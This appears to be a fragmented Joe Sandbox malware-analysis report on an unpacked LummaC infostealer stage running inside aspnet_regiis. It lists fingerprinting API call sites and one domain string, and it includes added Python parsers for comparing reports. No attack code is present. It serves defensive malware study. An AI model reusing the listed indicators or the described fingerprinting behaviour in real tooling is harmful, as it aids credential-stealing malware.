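• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
Similarity
• String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
• Instruction Fuzzy Hash: 09A103B52047818FD716CF2AC4D0756BBE2FFA6304B18899CC8D24F75AD736A446CB91
control_flow_graph 1323 72c5d34a-72c5d362 1324 72c5d370-72c5d382 1328 72c5d3c1-72c5d40f call 72c6fe00 GetPhysicallyInstalledSystemMemory
APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 72C5D3EE
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID: ><+
• Instruction Fuzzy Hash: 88C1C0756047818FD715CF2AC490762FBF2AF9A314B28899DC4EB8B752C735E846CB50
"""

if __name__ == "__main__":
    print("\n".join(summarize(parse_blocks(SAMPLE))))
```

Run it against the full report text (copy the function blocks into a file and pass its contents to parse_blocks) to get one line per function with the Instruction Fuzzy Hash prefix, which is the field worth pivoting on when comparing this unpacked stage against other LummaC samples; the String ID scan is deliberately loose, so review its domain hits by hand before treating them as indicators.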
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: @Ukx$
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                                                  • Opcode ID: 12f8496ffa148b3f09076524ad90a999b37e5d37b93516ee31a7795007306739
                                                                                                                                                                                                                                                                  • Instruction ID: 7b404ae39f886bfa66500402a4b2d1de45831173c52331bbd05ee2e7c8e1e1e6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12f8496ffa148b3f09076524ad90a999b37e5d37b93516ee31a7795007306739
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9B15332B087504BD318CE29CCE26ABB7A3EBE5314F198A3CD9975B385DA759C058781
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LdrInitializeThunk.NTDLL(72C7148A,035BF838,00000018,?,?,00000018,?,?,?), ref: 72C6E13E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                                                  • Opcode ID: ae24a9c0565cb71d9cc5d5f7a56972cb52d0df7ffd5bb92d7e772cc71c522cab
                                                                                                                                                                                                                                                                  • Instruction ID: 0958fb32b39ec00d43c48862865938bc7e2a18b60c33a4d36a496ca8dd1ae876
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae24a9c0565cb71d9cc5d5f7a56972cb52d0df7ffd5bb92d7e772cc71c522cab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11713AB1A043005BD7058A2EDC93B6B77F1DFE5318F69852CE48787382E634DA49C75A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: =<32
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                                                  • Opcode ID: e85814dc1c3a7c428ef50ac6838574ac2e2afb373a5494cd822b611795a871ef
                                                                                                                                                                                                                                                                  • Instruction ID: b164c5fce8d24b53a0c93597b6a72b756a2be1d90e473a5a4ebe282f1f9220f5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e85814dc1c3a7c428ef50ac6838574ac2e2afb373a5494cd822b611795a871ef
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56316639608344AFE304CE69CC90B3BB7AAEFE4754F159A2CE68257390E7B0D8408781
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: ,-
                                                                                                                                                                                                                                                                  • API String ID: 0-1027024164
                                                                                                                                                                                                                                                                  • Opcode ID: a1944d2d9709ad2fe14c7f4ea07cfd0e6a07cea613789c0f27e2245553877723
                                                                                                                                                                                                                                                                  • Instruction ID: 100fe3d2155e1d88966e0cf56399d455cd435e9411571d4e852fcd22ff74b789
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1944d2d9709ad2fe14c7f4ea07cfd0e6a07cea613789c0f27e2245553877723
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E2167A19503008BC3129F2ECC56627B7B2EFD2364F559618F4828F351F3B4C906C7A6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-2766056989
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: EnvironmentExpandStrings$Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID:
• API String ID: 1780199113-0
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
• Executed
• Not Executed
• Graph (image not recoverable): basic blocks 72c5d7ee-72c5d7f3 through 72c5dc30-72c5dc72; block 72c5d896-72c5dbfb contains FreeLibrary and a call to 72c6fe00, block 72c5dc30-72c5dc72 contains GetComputerNameExA
APIs
• FreeLibrary.KERNEL32(?), ref: 72C5D898
• GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 72C5DC43
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: ComputerFreeLibraryName
• String ID: ;87>
• API String ID: 2904949787-2104535307

Control-flow Graph
• Executed
• Not Executed
• Graph (image not recoverable): basic blocks 72c5d893-72c5dbfb through 72c5dc30-72c5dc72; block 72c5d893-72c5dbfb contains FreeLibrary and a call to 72c6fe00, block 72c5dc30-72c5dc72 contains GetComputerNameExA
APIs
• FreeLibrary.KERNEL32(?), ref: 72C5D898
• GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 72C5DC43
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: ComputerFreeLibraryName
• String ID: ;87>
• API String ID: 2904949787-2104535307
APIs
• GetForegroundWindow.USER32 ref: 72C6E3BA
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-3019521637
                                                                                                                                                                                                                                                                  • Opcode ID: 7d9c4801b976e5ae29a8d71633f73bdb9194d6569060c5ee7e19ccd28d52a848
                                                                                                                                                                                                                                                                  • Instruction ID: 9aa140ad756664d971f887c9e9de3204d5447a169867ae66af4726620d1c869f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d9c4801b976e5ae29a8d71633f73bdb9194d6569060c5ee7e19ccd28d52a848
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33112F77E8089147DF08CA3DCC561AA77A2A3E432573D4ABDC816E3380D93858068740
APIs
• LoadLibraryExW.KERNEL32(?,00000000), ref: 72C39D98
• LoadLibraryExW.KERNEL32(?,00000000), ref: 72C39E78
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: b918624d5eb4c8be4399d2216491bebc755a9bb774e07d36884af07effcf139e
• Instruction ID: fbfe8146819471b2bdd73502d8c795b4e3258d82f0f2871567b50325e402ba97
• Opcode Fuzzy Hash: b918624d5eb4c8be4399d2216491bebc755a9bb774e07d36884af07effcf139e
• Instruction Fuzzy Hash: 5D4112B4D003409FE7159F78D9D6A9A7FB1FB56224F60479CD4902F3A6C631940ACBE2
APIs
• CoInitializeEx.OLE32(00000000,00000002), ref: 72C3EF57
• CoInitializeEx.COMBASE(00000000,00000002), ref: 72C3F09C
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: a7b3961675672919f6088dea3a4f57b199d9ff14327bb489dd7c0d47c58f43ed
• Instruction ID: c12f7e5fe1714a418e7775e6f727b9d241e99ba48f14bb08c2aafd3a8cbd7116
• Opcode Fuzzy Hash: a7b3961675672919f6088dea3a4f57b199d9ff14327bb489dd7c0d47c58f43ed
• Instruction Fuzzy Hash: 1741C6B4910B40AFD370EF398A0B7137EB8AB05250F504B1DF9E6866D4E331A4198BD7
APIs
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 72C3EC89
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 72C3ECA2
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: 1d18f1cf9d80352d2819703c61cfc5232ac075f7b4cdee65f973ba21067914c9
• Instruction ID: cbe8297162fac649ce7abe9fe07c0c4999db27ab2ebcb34658043bd02c879393
• Opcode Fuzzy Hash: 1d18f1cf9d80352d2819703c61cfc5232ac075f7b4cdee65f973ba21067914c9
• Instruction Fuzzy Hash: 4AE0E2753D83917AF3788602CD1BF243221AB61F22F300708B7213E3C48BE03504450C
APIs
• GetUserDefaultUILanguage.KERNELBASE ref: 72C6779D
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: DefaultLanguageUser
• String ID:
• API String ID: 95929093-0
• Opcode ID: b50b340b07807020c386f951b2400486080bc1681c8a9fa1558a57be9792f029
• Instruction ID: dc741fb81d0f0153cd1b35c9f73aa494ab7ab0b60082b3ae760283cd1032d7c6
• Opcode Fuzzy Hash: b50b340b07807020c386f951b2400486080bc1681c8a9fa1558a57be9792f029
• Instruction Fuzzy Hash: 4A31D532B466808FD715CA7CC8D37ADBFE38BE5214F1E81A9D459CB391C9388946CB20
APIs
• GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 72C5DD03
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 74f65b53fdf065f2fed50168027f60320ad43909a8cb410cde32cd6dc8c7e154
• Instruction ID: 8421f6aa2f28d463f09ba3c359a6108f10c6100d0399eb0b093f7788c96ce285
• Opcode Fuzzy Hash: 74f65b53fdf065f2fed50168027f60320ad43909a8cb410cde32cd6dc8c7e154
• Instruction Fuzzy Hash: 4521A470504B918BD7268F3AC460722BBE2BF6B204F2896DDD4D38B78AC674E446C765
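The entries above are the report's per-function listing for the image mapped at 72C30000 in process 3 (the aspnet_regiis snapshot): each block records the Win32/COM call sites Joe Sandbox resolved in that function, the .sdmp region the code was lifted from, and the similarity hashes. Read together, the calls are host fingerprinting and COM setup: CoInitializeEx(NULL, 2) is COINIT_APARTMENTTHREADED, CoInitializeSecurity(..., dwAuthnLevel=0, dwImpLevel=3, ...) is RPC_C_AUTHN_LEVEL_DEFAULT with RPC_C_IMP_LEVEL_IMPERSONATE (the initialisation a WMI client performs before connecting to a namespace, which fits the report's WMI-based Win32_VideoController and antivirus checks), and GetComputerNameExA(5, ...) asks for ComputerNamePhysicalDnsHostname. The following script is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses this listing format into records, decodes those documented SDK constants, and builds a call-site inventory that can be compared across reports. The embedded input is an excerpt of the entries above with the table whitespace and "Download File" link text removed. One assumption is labelled in the code: the fourth dot-separated field of a .sdmp file name is taken to be the region base address, because 0000000072C31000 in the Source File name is one page above the stated Offset 72C30000 and the Associated file for 72C30000 carries that value; the remaining fields are kept as raw integers because the report does not state their meaning.

```python
"""Parse Joe Sandbox function-dump entries (APIs / Memory Dump Source /
Similarity blocks) into records and decode well-known argument constants."""
import re
from dataclasses import dataclass, field

# Constructed input: excerpt of the report listing above, de-indented.
SAMPLE = """\
APIs
• CoInitializeEx.OLE32(00000000,00000002), ref: 72C3EF57
• CoInitializeEx.COMBASE(00000000,00000002), ref: 72C3F09C
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
APIs
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 72C3EC89
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
APIs
• GetUserDefaultUILanguage.KERNELBASE ref: 72C6779D
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
APIs
• GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 72C5DD03
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
"""

API_RE = re.compile(r"^• (\w+)\.(\w+)(?:\(([^)]*)\))?,? ref: ([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
ASSOC_RE = re.compile(r"^• Associated: (\S+)$")
KV_RE = re.compile(r"^• ([A-Za-z ]+): ?(.*)$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # int per hex argument, None where the report shows '?'
    ref: int     # call-site address

@dataclass
class Entry:
    apis: list = field(default_factory=list)
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    associated: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # Similarity / IDA plugin fields

def parse_args(text):
    if not text:
        return []
    return [None if a == "?" else int(a, 16) for a in text.split(",")]

def parse(report):
    """Split the listing at each 'APIs' header and fill one Entry per function."""
    entries, cur = [], None
    for raw in report.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Entry(); entries.append(cur); continue
        if cur is None or line in ("Memory Dump Source", "Similarity", "Joe Sandbox IDA Plugin"):
            continue
        if m := API_RE.match(line):
            api, mod, args, ref = m.groups()
            cur.apis.append(ApiCall(api, mod, parse_args(args), int(ref, 16)))
        elif m := SRC_RE.match(line):
            cur.source_file, cur.offset, cur.based_on_pe = m[1], int(m[2], 16), m[3] == "true"
        elif m := ASSOC_RE.match(line):
            cur.associated.append(m[1])
        elif m := KV_RE.match(line):
            cur.meta[m[1]] = m[2]
    return entries

def dump_base(name):
    # Assumption: field 4 of the .sdmp name is the region base (72C31000 is
    # Offset 72C30000 + one page); other fields are not interpreted here.
    return int(name.split(".")[3], 16)

# Documented Win32 SDK values for the constants seen in the listing.
COINIT = {0: "COINIT_MULTITHREADED", 2: "COINIT_APARTMENTTHREADED"}
AUTHN = {0: "RPC_C_AUTHN_LEVEL_DEFAULT", 1: "RPC_C_AUTHN_LEVEL_NONE", 2: "RPC_C_AUTHN_LEVEL_CONNECT",
         3: "RPC_C_AUTHN_LEVEL_CALL", 4: "RPC_C_AUTHN_LEVEL_PKT", 5: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
         6: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"}
IMP = {0: "RPC_C_IMP_LEVEL_DEFAULT", 1: "RPC_C_IMP_LEVEL_ANONYMOUS", 2: "RPC_C_IMP_LEVEL_IDENTIFY",
       3: "RPC_C_IMP_LEVEL_IMPERSONATE", 4: "RPC_C_IMP_LEVEL_DELEGATE"}
NAME_FMT = ["ComputerNameNetBIOS", "ComputerNameDnsHostname", "ComputerNameDnsDomain",
            "ComputerNameDnsFullyQualified", "ComputerNamePhysicalNetBIOS",
            "ComputerNamePhysicalDnsHostname", "ComputerNamePhysicalDnsDomain",
            "ComputerNamePhysicalDnsFullyQualified"]

def decode(call):
    """Name the constant arguments of the calls this listing contains."""
    a = call.args
    if call.api == "CoInitializeEx" and len(a) >= 2 and a[1] is not None:
        return {"dwCoInit": COINIT.get(a[1], hex(a[1]))}
    if call.api == "CoInitializeSecurity" and len(a) >= 6:
        return {"dwAuthnLevel": AUTHN.get(a[4]), "dwImpLevel": IMP.get(a[5])}
    if call.api == "GetComputerNameExA" and a and a[0] is not None and a[0] < len(NAME_FMT):
        return {"NameType": NAME_FMT[a[0]]}
    return {}

def inventory(entries):
    """API name -> sorted unique (module, call-site) pairs, for cross-report diffing."""
    out = {}
    for e in entries:
        for c in e.apis:
            out.setdefault(c.api, []).append((c.module, c.ref))
    return {k: sorted(set(v)) for k, v in out.items()}

if __name__ == "__main__":
    for e in parse(SAMPLE):
        for c in e.apis:
            print(f"{c.ref:08X} {c.api}.{c.module} {decode(c)} region {dump_base(e.source_file):08X}")
```

The inventory keyed by API name and call-site address is what you diff between two reports of the same family: identical (module, ref) pairs across samples indicate the same unpacked payload build, while the Instruction Fuzzy Hash values the report carries in the meta dictionary let you match functions when the base address or the call sites have moved.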
APIs
• GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 72C5DD03
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
